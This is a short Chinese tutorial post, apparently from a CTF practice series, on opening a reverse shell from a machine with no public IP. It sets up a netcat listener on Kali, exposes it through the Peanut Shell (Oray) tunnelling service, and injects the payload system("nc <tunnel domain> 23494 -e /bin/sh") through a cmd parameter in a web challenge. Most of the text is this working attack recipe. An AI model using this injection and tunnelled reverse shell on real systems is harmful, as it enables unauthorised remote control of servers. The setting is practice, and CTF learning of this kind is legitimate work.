【Try to Hack】无公网ip如何反弹shell

学自这个视频

内网kali端口监听
nc -lvvnp 54321

进行内网穿透，下载花生壳(免费的)，需要注册才可以下载
https://www.oray.com/


点击映射数，会跳转到浏览器

点击新增映射

内网主机为kali的IP

分配了域名和端口

打开一个题目

传参?cmd=system("nc s546459d57.zicp.fun 23494 -e /bin/sh");
s546459d57.zicp.fun 23494为分配的域名和端口

反弹shell